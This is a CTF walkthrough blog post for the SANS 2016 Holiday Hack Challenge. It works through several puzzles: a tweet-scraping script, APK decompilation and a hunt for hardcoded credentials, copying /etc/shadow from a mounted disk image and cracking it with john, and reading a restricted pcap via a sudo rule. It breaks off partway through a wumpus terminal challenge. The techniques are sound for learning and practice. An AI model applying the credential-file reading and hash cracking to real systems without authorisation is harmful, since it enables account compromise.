tl;dr: SANS released the 2016 Christmas Holiday Hack Challenge. This serves as my official submitted answer, and my offering to you, dear reader, in case you want to see how I approached the challenges.

So settle in, this is going to be a long post. At the time of writing the challenge is still live, and SANS typically keeps the servers up so the historical challenges can still be played. As this is a long post you may not want to read it all; if you're here looking for help or the answer to a specific challenge, use the index to jump to that question.

Index:

Introduction

Ruined presents. A shattered Christmas tree. Needles strewn all about. Obvious signs of a fight. And there, beside it all, was Santa’s big blue sack. But Santa himself was nowhere to be found.

In shock, Jessica uttered, “Someone has abducted Santa Claus!”

Josh was horrified. “Who would do such a thing? And on Christmas Eve, no less. They’ll destroy Christmas! But why?”

The kids scanned for clues, and there on the floor, they found a most unexpected item: a small, rectangular piece of cardstock. Picking it up, Joshua announced, “Hey! This looks like Santa’s business card. It must have fallen out of his pocket while someone was kidnapping him.”

Jess took the card from Joshua’s hands and read it. “It is his business card. And we’re the only ones who know that Santa has disappeared. We’ve got to do something. If we don’t find and rescue Santa, Christmas will be destroyed! Let’s look closer at this card to see if it can be any help in finding out what happened.”

Questions

What is the secret message in Santa’s tweets?

From the business card we got from talking to the Dosis children we now know Santa’s social media accounts.

Taking a look at the @santawclaus feed we can see a lot of seemingly random text. It will be much easier to read if it's all in one place. Twitter has an API we can use to read tweets, and a quick Google search turns up some really useful sample code we can adjust.

```python
# Source: http://www.craigaddyman.com/mining-all-tweets-with-python/
from twython import Twython  # pip install twython
import time  # standard lib

''' Go to https://apps.twitter.com/ to register your app to get your api keys '''
CONSUMER_KEY = ''
CONSUMER_SECRET = ''
ACCESS_KEY = ''
ACCESS_SECRET = ''

twitter = Twython(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_KEY, ACCESS_SECRET)

lis = [798175529463676928]  ## this is the latest starting tweet id

for i in range(0, 16):  ## iterate through all tweets
    ## tweet extract method with the last list item as the max_id
    user_timeline = twitter.get_user_timeline(screen_name="santawclaus",
                                              count=200,
                                              include_retweets=False,
                                              max_id=lis[-1])
    with open('tweetout.txt', 'a') as out:
        for tweet in user_timeline:
            print(tweet['text'])  ## print the tweet
            lis.append(tweet['id'])  ## append tweet id's
            out.write('{0}\n'.format(tweet['text']))
    time.sleep(30)  ## be polite to the rate limiter between pages
```

Running this writes the tweets to tweetout.txt one per line, and viewed together in a fixed-width font they form ASCII art spelling out the message.


Answer: BUGBOUNTY
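To see why the concatenated feed reads as a picture: every tweet is a fixed-width row built from a small filler vocabulary (SANTA, ELF, HOHOHO and so on), and the letters of the message are drawn in punctuation on top of that background. This added helper (mine, not part of the original post or the sample code above) blanks the filler words so the glyphs stand out; it assumes the tweets were saved one per line, as tweetout.txt is above.

```python
import re
import sys

# Filler vocabulary the feed is built from (taken from the tweet output).
# Longest first so the alternation never matches a short word inside a longer one.
FILLER = sorted(
    ["GOODWILLTOWARDSMEN", "PEACEONEARTH", "CHRISTMAS", "NORTHPOLE",
     "HOHOHO", "SANTA", "ELF", "JOY"],
    key=len, reverse=True,
)
FILLER_RE = re.compile("|".join(FILLER))


def strip_filler(row: str) -> str:
    """Replace each filler word with spaces of the same length.

    Keeping the length preserves every column, so the punctuation that
    draws the glyphs stays exactly where it was.  Q and W are left alone:
    the feed uses them both as row padding and as fill around the art.
    """
    return FILLER_RE.sub(lambda m: " " * (m.end() - m.start()), row)


def art_rows(rows):
    """De-noise every row and drop rows that carry no glyph strokes at all
    (filler and padding only), which is what the blank margins look like."""
    cleaned = [strip_filler(r.rstrip("\r\n")) for r in rows]
    return [r for r in cleaned if r.strip(" QW")]


def reveal(rows) -> str:
    """Return the de-noised feed as one multi-line string."""
    return "\n".join(art_rows(rows))


# Constructed sample shaped like the real rows: a margin row, then two rows
# carrying part of a glyph outline. Not real tweets.
SAMPLE = [
    "SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO",
    "SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF",
    "GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY",
]

if __name__ == "__main__":
    # Usage: python reveal.py tweetout.txt   (no argument: run on SAMPLE)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            print(reveal(fh))
    else:
        print(reveal(SAMPLE))
```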

What is inside the ZIP file distributed by Santa's team?

For this we look at the Instagram account. We spot a picture of a very untidy desk. Looking a little closer, there are a few things of interest that help us identify the zip file.

A zip file name and a domain name: http://northpolewonderland.com/SantaGram_v4.2.zip. We can use the password bugbounty we got from the previous question to unlock the zip, and we get:

An APK file.

What username and password are embedded in the APK file?

For this we need to decompile the APK back into something resembling source code so we can look through it.

The clues from walking around the North Pole suggested apktool, which sounds like a good idea to me. Follow the install guide at https://ibotpeaches.github.io/Apktool/install/

```
thehermit@TECHANARCHY:~/SANS$ apktool d SantaGram_4.2.apk
I: Using Apktool 2.2.1 on SantaGram_4.2.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/thehermit/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
thehermit@TECHANARCHY:~/SANS$
```

I now have a folder with all the decompiled source code, and there's a lot of it. Grep is going to be my friend here. I'm looking for usernames and passwords, so let's start there.

```
egrep -r -A2 'username|password' SantaGram_4.2
```

This command tells grep to use extended regular expressions, search for 'username' OR 'password', and read all files recursively in the SantaGram_4.2 folder, which is where all our source is now stored. The -A2 tells grep to also display the 2 lines after each match. This is needed because in smali the key name is loaded on one line and the value is loaded on a following line.

```
. . .
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali:    const-string v1, "username"
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-    const-string v2, "guest"
--
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali:    const-string v1, "password"
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-    const-string v2, "busyreindeer78"
. . .
```

That looks like our answer.

Username = guest password = busyreindeer78
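The grep -A2 pairing above can be automated for a whole decompiled tree. This is an added example, not code from the original post: it scans .smali files for a key constant such as "username" or "password" and reports the next const-string within a two-line window, which is how hardcoded credentials like these get flagged in an app review. The sample smali below is constructed from the SplashScreen.smali fragment above.

```python
"""Find credential constants in decompiled smali (added example, constructed sample)."""
import re
from pathlib import Path
from typing import Dict, List, Tuple

# A smali string constant: const-string vN, "literal" (also const-string/jumbo)
CONST_STRING = re.compile(r'^\s*const-string(?:/jumbo)?\s+[vp]\d+,\s*"((?:[^"\\]|\\.)*)"')

# Key names whose following constant is worth a look; extend as needed.
KEY_NAMES = {"username", "password", "passwd", "api_key", "secret", "token"}


def find_secrets(smali_text: str, window: int = 2) -> List[Tuple[str, str, int]]:
    """Return (key, value, line_no) triples.

    A const-string whose literal is a key name is paired with the next
    const-string found within `window` following lines, mirroring grep -A2
    (smali emits a blank line between the key and the value constant).
    """
    lines = smali_text.splitlines()
    hits = []
    for i, line in enumerate(lines):
        m = CONST_STRING.match(line)
        if not m or m.group(1).lower() not in KEY_NAMES:
            continue
        for j in range(i + 1, min(i + 1 + window, len(lines))):
            n = CONST_STRING.match(lines[j])
            if n:
                hits.append((m.group(1), n.group(1), i + 1))
                break
    return hits


def scan_tree(root: str) -> Dict[str, List[Tuple[str, str, int]]]:
    """Walk an apktool output directory and collect hits per .smali file."""
    findings = {}
    for path in Path(root).rglob("*.smali"):
        hits = find_secrets(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed sample modelled on the SplashScreen.smali fragment above.
SAMPLE_SMALI = """\
    const-string v1, "username"

    const-string v2, "guest"

    invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
    const-string v1, "password"

    const-string v2, "busyreindeer78"

    const-string v3, "Navigate home"
"""

if __name__ == "__main__":
    for key, value, line_no in find_secrets(SAMPLE_SMALI):
        print(f"line {line_no}: {key} = {value!r}")
```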

What is the name of the audible component (audio file) in the SantaGram APK file?

We are looking for an audio file, so let’s search for MP3s.

thehermit@TECHANARCHY:~/SANS$ find SantaGram_4.2/ -type f -name *.mp3
SantaGram_4.2/res/raw/discombobulatedaudio1.mp3

This command tells find to look recursively through the SantaGram_4.2 directory and list all items that are files and match the filename *.mp3. If the file wasn’t named as an mp3, or was some other format, we could run the file command on every file and see which are detected as audio.

thehermit@TECHANARCHY:~/SANS$ find SantaGram_4.2 -type f -exec file {} + | grep audio
SantaGram_4.2/res/raw/discombobulatedaudio1.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo

One of the useful elements of find is that when it finds a matching item you can run other commands on it. In this case, with the -exec option, it runs the unix file command on every item that is a file. From there we just pipe the output into grep to filter for audio files.

Whichever way you try the answer is discombobulatedaudio1.mp3

What is the password for the “cranpi” account on the Cranberry Pi System?

Before you can answer this question you need to complete the Cranberry Pi quests and have assembled your Pi; see the Quests for more information. Once the Pi is assembled by Holly Evergreen you will be given a Cranbian image to download: https://www.northpolewonderland.com/cranbian.img.zip

Once unzipped, file tells us it’s an x86 boot sector, so as expected this is a disk image. The easiest way to get the current password is to grab a copy of the /etc/shadow file and crack the hashes.

First let’s mount the image so we can grab the file we need. To mount the OS partition we first need to calculate the starting offset of the partition and then use the mount command.

thehermit@TECHANARCHY:~/SANS$ fdisk -l cranbian-jessie.img

Disk cranbian-jessie.img: 1389 MB, 1389363200 bytes
255 heads, 63 sectors/track, 168 cylinders, total 2713600 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x5a7089a1

              Device Boot      Start         End      Blocks   Id  System
cranbian-jessie.img1            8192      137215       64512    c  W95 FAT32 (LBA)
cranbian-jessie.img2          137216     2713599     1288192   83  Linux
thehermit@TECHANARCHY:~/SANS$

fdisk tells us there are two partitions on this image. The first is typically the boot partition and the second is the OS partition. In this instance the Linux partition starts at sector 137216 and the sector size is 512 bytes. Multiplying these together gives the byte offset of our OS file system within the image file: 70254592.
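The same offset can be read straight from the image’s partition table rather than copied by hand from fdisk. This is an added example, not part of the original post: it parses the four primary entries of a classic MBR and returns the mount offset for the Linux partition; the MBR bytes are constructed to reproduce the fdisk table above.

```python
"""Compute mount -o offset=... values from an MBR (added example, constructed image)."""
import struct
from typing import List, NamedTuple

SECTOR_SIZE = 512           # logical sector size reported by fdisk above
MBR_SIGNATURE = b"\x55\xaa"
PART_TABLE_OFFSET = 446     # four 16-byte entries precede the 0x55AA signature


class Partition(NamedTuple):
    index: int       # 1-based, as in "cranbian-jessie.img1"
    type_id: int     # 0x0c W95 FAT32 (LBA), 0x83 Linux, ...
    start_lba: int   # first sector
    sectors: int     # length in sectors

    @property
    def byte_offset(self) -> int:
        """Value to pass as mount -o loop,offset=... for this partition."""
        return self.start_lba * SECTOR_SIZE


def parse_mbr(mbr: bytes) -> List[Partition]:
    """Parse the primary partition table of a 512-byte MBR sector."""
    if len(mbr) < 512 or mbr[510:512] != MBR_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature; not an MBR image")
    parts = []
    for i in range(4):
        entry = mbr[PART_TABLE_OFFSET + 16 * i: PART_TABLE_OFFSET + 16 * (i + 1)]
        # layout: status(1) CHS start(3) type(1) CHS end(3) LBA start(4 LE) sectors(4 LE)
        _status, type_id, start_lba, sectors = struct.unpack("<B3xB3xII", entry)
        if type_id == 0 or sectors == 0:
            continue  # unused slot
        parts.append(Partition(i + 1, type_id, start_lba, sectors))
    return parts


def linux_partition_offset(mbr: bytes) -> int:
    """Byte offset of the first Linux (0x83) partition, the one holding /etc."""
    for p in parse_mbr(mbr):
        if p.type_id == 0x83:
            return p.byte_offset
    raise LookupError("no Linux partition in table")


def build_mbr(entries) -> bytes:
    """Build a 512-byte MBR from (type_id, start_lba, sectors) tuples (test helper)."""
    table = b"".join(
        struct.pack("<B3sB3sII", 0, b"\0\0\0", t, b"\0\0\0", s, n) for t, s, n in entries
    ).ljust(64, b"\0")
    return bytes(PART_TABLE_OFFSET) + table + MBR_SIGNATURE


# Constructed MBR reproducing the fdisk table above: img1 FAT32 8192-137215,
# img2 Linux 137216-2713599 (sector counts derived from those ranges).
CRANBIAN_MBR = build_mbr([
    (0x0C, 8192, 137215 - 8192 + 1),
    (0x83, 137216, 2713599 - 137216 + 1),
])

if __name__ == "__main__":
    # With a real image: parse_mbr(open("cranbian-jessie.img", "rb").read(512))
    for p in parse_mbr(CRANBIAN_MBR):
        print(f"img{p.index} type=0x{p.type_id:02x} start={p.start_lba} offset={p.byte_offset}")
```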

Then it’s just a matter of mounting it and copying out the /etc/passwd and /etc/shadow files.

root@kali:~# mkdir cranbian_mount
root@kali:~# mount -o loop,offset=70254592 cranbian-jessie.img cranbian_mount/
root@kali:~# cp cranbian_mount/etc/passwd .
root@kali:~# cp cranbian_mount/etc/sh
shadow   shadow-  shells
root@kali:~# cp cranbian_mount/etc/sh
shadow   shadow-  shells
root@kali:~# cp cranbian_mount/etc/shadow .

We have the hash for the cranpi account:

root:*:17067:0:99999:7:::
daemon:*:17067:0:99999:7:::
bin:*:17067:0:99999:7:::
sys:*:17067:0:99999:7:::
sync:*:17067:0:99999:7:::
games:*:17067:0:99999:7:::
man:*:17067:0:99999:7:::
lp:*:17067:0:99999:7:::
mail:*:17067:0:99999:7:::
news:*:17067:0:99999:7:::
uucp:*:17067:0:99999:7:::
proxy:*:17067:0:99999:7:::
www-data:*:17067:0:99999:7:::
backup:*:17067:0:99999:7:::
list:*:17067:0:99999:7:::
irc:*:17067:0:99999:7:::
gnats:*:17067:0:99999:7:::
nobody:*:17067:0:99999:7:::
systemd-timesync:*:17067:0:99999:7:::
systemd-network:*:17067:0:99999:7:::
systemd-resolve:*:17067:0:99999:7:::
systemd-bus-proxy:*:17067:0:99999:7:::
messagebus:*:17067:0:99999:7:::
avahi:*:17067:0:99999:7:::
ntp:*:17067:0:99999:7:::
sshd:*:17067:0:99999:7:::
statd:*:17067:0:99999:7:::
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

Now time to get cracking. Another elf in the North Pole suggested the rockyou wordlist, which is included in Kali, would be a good choice.

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt --fork=4 combined.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status

It doesn’t take long before our password is cracked.

root@kali:~# john combined.txt --show
cranpi:yummycookies:1000:1000:,,,:/home/cranpi:/bin/bash

1 password hash cracked, 0 left
root@kali:~#

Answer: yummycookies

How did you open each terminal door and where had the villain imprisoned Santa?

Now we have completed the Cranberry Pi achievements we can access the terminals in the North Pole. There are 5 terminals, and you can use the maps at the end of this post to figure out where each one is located.

Elf House #2 - Peacoats and Pcaps

When you first load the terminal you are presented with the following.

Seems simple enough, let’s tcpdump /out.pcap and see what we have.

scratchy@f104dddd0fc6:/$ tcpdump -r out.pcap
tcpdump: out.pcap: Permission denied
scratchy@f104dddd0fc6:/$

OK, not that simple then. Let’s have a look at the permissions on the pcap file.

scratchy@f104dddd0fc6:/$ ls -ahtl /out.pcap
-r-------- 1 itchy itchy 1.1M Dec  2 15:05 /out.pcap

Seems itchy is the only user who can read the file. We need to be itchy. Let’s try a few ways to run tcpdump as itchy.

scratchy@f104dddd0fc6:/$ su - itchy -c tcpdump /out.pcap
Password:

That’s not going to work.

scratchy@f104dddd0fc6:/$ sudo -u itchy tcpdump -r /out.pcap
sudo: unable to resolve host f104dddd0fc6
reading from file out.pcap, link-type EN10MB (Ethernet)
11:28:00.520764 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [S], seq 2857348850, win 65535, options [mss 1460,nop,wscale 5,nop,nop,TS val 2773686863 ecr 0,sackOK,eol], length 0
11:28:00.520829 IP 192.168.188.130.http > 192.168.188.1.52102: Flags [S.], seq 2484589859, ack 2857348851, win 28960, options [mss 1460,sackOK,TS val 638274 ecr 2773686863,nop,wscale 7], length 0
11:28:00.520967 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [.], ack 1, win 4117, options [nop,nop,TS val 2773686863 ecr 638274], length 0
11:28:00.521004 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [P.], seq 1:160, ack 1, win 4117, options [nop,nop,TS val 2773686863 ecr 638274], length 159
11:28:00.521010 IP 192.168.188.130.http > 192.168.188.1.52102: Flags [.], ack 160, win 235, options [nop,nop,TS val 638274 ecr 2773686863], length 0

Excellent, looks like there is an entry in the /etc/sudoers file that lets scratchy run tcpdump as itchy and so read this file.

Now let’s see about that password. tcpdump gave us a lot of output; I’m probably looking for a clear-text password, so let’s just try strings.

scratchy@f104dddd0fc6:/$ sudo -u itchy strings out.pcap
sudo: unable to resolve host f104dddd0fc6
ZAX<
ZAX}
ZAX,
BGET /firsthalf.html HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept: */*
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
ZAX2
4hf@
Ehg@
OHTTP/1.0 200 OK
ZAX
ZAX#
[hh@
OServer: SimpleHTTP/0.6 Python/2.7.12+
ZAXr
rhi@
ODate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: text/html
Ihj@
PContent-Length: 113
ZAX
ZAX2
ZAXI
dhk@
PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT
P<html>
<head></head>
<body>
<form>
<input type="hidden" name="part1" value="santasli" />
</form>
</body>
</html>
4hm@
ZAXW
@2/@
DGET /secondhalf.bin HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept: */*
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
ZAX
THTTP/1.0 200 OK
TServer: SimpleHTTP/0.6 Python/2.7.12+
ZAX"
,#"=X
TDate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: application/octet-stream
ZAXr
,#o=X
UContent-Length: 1048097
Last-Modified: Fri, 02 Dec 2016 11:26:12 GMT
4-1@

This gives us part one, “santasli”, and as any good Simpsons fan will tell you, the full password is going to be santaslittlehelper. But how can we read the bin file that contains the second half?

Let’s try strings again and change the encoding to read 16-bit little-endian (unicode) strings.

scratchy@f104dddd0fc6:/$ sudo -u itchy strings -e l out.pcap
sudo: unable to resolve host f104dddd0fc6
part2:ttlehelper

That confirms it. The password to the door is santaslittlehelper
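To show why part2 only surfaced with strings -e l, here is an added example (not code from the original post) that extracts printable runs from binary data the way strings does for plain ASCII and for UTF-16LE, and reports which encoding exposes a given marker. The capture bytes are constructed: an HTML response carrying part1 in ASCII and a blob carrying part2 as UTF-16LE.

```python
"""ASCII vs UTF-16LE string extraction (added example, constructed sample capture)."""
import re
from typing import Dict, List

MIN_LEN = 4  # same default minimum length as the strings utility

# Printable ASCII 0x20-0x7e plus tab, at least MIN_LEN in a row.
_ASCII_RUN = re.compile(rb"[\x20-\x7e\t]{%d,}" % MIN_LEN)
# UTF-16LE text: each printable ASCII byte is followed by a NUL byte, so a
# byte-oriented ASCII scan only ever sees single characters and skips it.
_UTF16LE_RUN = re.compile(rb"(?:[\x20-\x7e\t]\x00){%d,}" % MIN_LEN)


def ascii_strings(data: bytes) -> List[str]:
    """Equivalent of plain `strings` on the data."""
    return [m.group().decode("ascii") for m in _ASCII_RUN.finditer(data)]


def utf16le_strings(data: bytes) -> List[str]:
    """Equivalent of `strings -e l` (16-bit little-endian) on the data."""
    return [m.group().decode("utf-16-le") for m in _UTF16LE_RUN.finditer(data)]


def find_marker(data: bytes, marker: str) -> Dict[str, List[str]]:
    """Report which encoding's strings contain `marker`, e.g. 'part2'."""
    return {
        "ascii": [s for s in ascii_strings(data) if marker in s],
        "utf-16le": [s for s in utf16le_strings(data) if marker in s],
    }


# Constructed stand-in for out.pcap: junk bytes, the first-half HTML form in
# ASCII, more junk, then the second half encoded as UTF-16LE.
SAMPLE_CAPTURE = (
    b"\x00\x1a\xff"
    + b'<input type="hidden" name="part1" value="santasli" />'
    + b"\x07\x00"
    + bytes(range(0x80, 0x90))
    + "part2:ttlehelper".encode("utf-16-le")
    + b"\xde\xad"
)

if __name__ == "__main__":
    # With a real file: find_marker(open("out.pcap", "rb").read(), "part")
    print("ascii   :", ascii_strings(SAMPLE_CAPTURE))
    print("utf-16le:", utf16le_strings(SAMPLE_CAPTURE))
```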

Workshop Spiral Stairs - The one who Knocks

When you first open the terminal you are presented with the following.

Find the passphrase deep in the directories. OK, a recursive ls seems like a good shout here.

elf@0b29d16c9a9b:~$ ls -ahtlR
.:
total 32K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 .
drwxr-xr-x 22 root root 4.0K Dec  6 19:40 ..
-rw-r--r--  1 elf  elf  3.9K Dec  6 19:40 .bashrc
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 .doormat
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 var
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 temp
-rw-r--r--  1 elf  elf   220 Nov 12  2014 .bash_logout
-rw-r--r--  1 elf  elf   675 Nov 12  2014 .profile

./.doormat:
total 20K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 ..
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 . 
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 share
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 temp

./.doormat/. :
total 20K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40  
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 bin
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 not_here

./.doormat/. / :
total 20K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 \
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 opt
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 var

./.doormat/. / /\:
total 20K
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 \\
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 santa
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 ls

./.doormat/. / /\/\\:
total 20K
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  8 root root 4.0K Dec  6 19:40 Don't Look Here!
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 holiday
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 temp

./.doormat/. / /\/\\/Don't Look Here!:
total 20K
drwxr-xr-x  8 root root 4.0K Dec  6 19:40 .
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  6 root root 4.0K Dec  6 19:40 You are persistent, aren't you?
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 secret
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 files

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?:
total 20K
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 '
drwxr-xr-x  6 root root 4.0K Dec  6 19:40 .
drwxr-xr-x  8 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 cookbook
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 temp

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/':
total 12K
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .
drwxr-xr-x  6 root root 4.0K Dec  6 19:40 ..
-rw-r--r--  1 root root   17 Dec  6 19:39 key_for_the_door.txt

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook:
total 8.0K
drwxr-xr-x  6 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp:
total 8.0K
drwxr-xr-x  6 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/Don't Look Here!/secret:
total 8.0K
drwxr-xr-x  8 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/Don't Look Here!/files:
total 8.0K
drwxr-xr-x  8 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/holiday:
total 8.0K
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/\\/temp:
total 8.0K
drwxr-xr-x 10 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/santa:
total 8.0K
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /\/ls:
total 8.0K
drwxr-xr-x 12 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /opt:
total 8.0K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:40 .

./.doormat/. / /var:
total 8.0K
drwxr-xr-x 14 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/. /bin:
total 8.0K
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/. /not_here:
total 8.0K
drwxr-xr-x 16 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/share:
total 8.0K
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./.doormat/temp:
total 8.0K
drwxr-xr-x 18 root root 4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./var:
total 8.0K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .

./temp:
total 8.0K
drwxr-xr-x 20 elf  elf  4.0K Dec  6 19:40 ..
drwxr-xr-x  2 root root 4.0K Dec  6 19:39 .
elf@0b29d16c9a9b:~$

key_for_the_door.txt looks like a winner. But how to read it? I don’t really feel like trying to escape all those directory names. Fortunately I don’t need to. As we saw earlier, find has a nice -exec feature and will let me target a single file by name.

elf@0b29d16c9a9b:~$ find -name key_for_the_door.txt -exec cat {} +
key: open_sesame

This command is as simple as it looks: find a file named key_for_the_door.txt and then run cat against it, which outputs the contents of the file.

Password for the door is open_sesame

Santas Office - Chess

When you first open the terminal you are presented with the following.

Fans of the film WarGames should immediately recognise this and it doesn’t take long to realise we are playing the role of David. To complete this challenge just play out the scene making sure you get all the case and punctuation correct.

GREETINGS PROFESSOR FALKEN.

Hello.

HOW ARE YOU FEELING TODAY?

I'm fine. How are you?

EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?

People sometimes make mistakes.

YES THEY DO. SHALL WE PLAY A GAME?

Love to. How about Global Thermonuclear War?

WOULDN'T YOU PREFER A GOOD GAME OF CHESS?

Later. Let's play Global Thermonuclear War.

FINE

[ASCII-art world map]

UNITED STATES                              SOVIET UNION

WHICH SIDE DO YOU WANT?

1. UNITED STATES
2. SOVIET UNION

PLEASE CHOOSE ONE: 2

AWAITING FIRST STRIKE COMMAND
-----------------------------

PLEASE LIST PRIMARY TARGETS BY CITY AND/OR COUNTRY NAME: Las Vegas

LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE:

LOOK AT THE PRETTY LIGHTS

Press Enter To Continue

Password to the secret bookcase: LOOK AT THE PRETTY LIGHTS

Workshop - Top stairs - Gone Spelunking.

When you first open the terminal you are presented with the following

A quick ls shows us an executable file named wumpus, and opening it drops us into an old-school MUD.

elf@904691c2cd69:~$ ./wumpus
Instructions? (y-n) y
Sorry, but the instruction file seems to have disappeared in a
puff of greasy black smoke! (poof)
You're in a cave with 20 rooms and 3 tunnels leading from each room.
There are 3 bats and 3 pits scattered throughout the cave, and your
quiver holds 5 custom super anti-evil Wumpus arrows. Good luck.

You are in room 16 of the cave, and have 5 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 13, 15, and 19.
Move or shoot? (m-s)

No instructions, sad times. What about checking for command line help?

elf@904691c2cd69:~$ ./wumpus --help
./wumpus: invalid option -- '-'
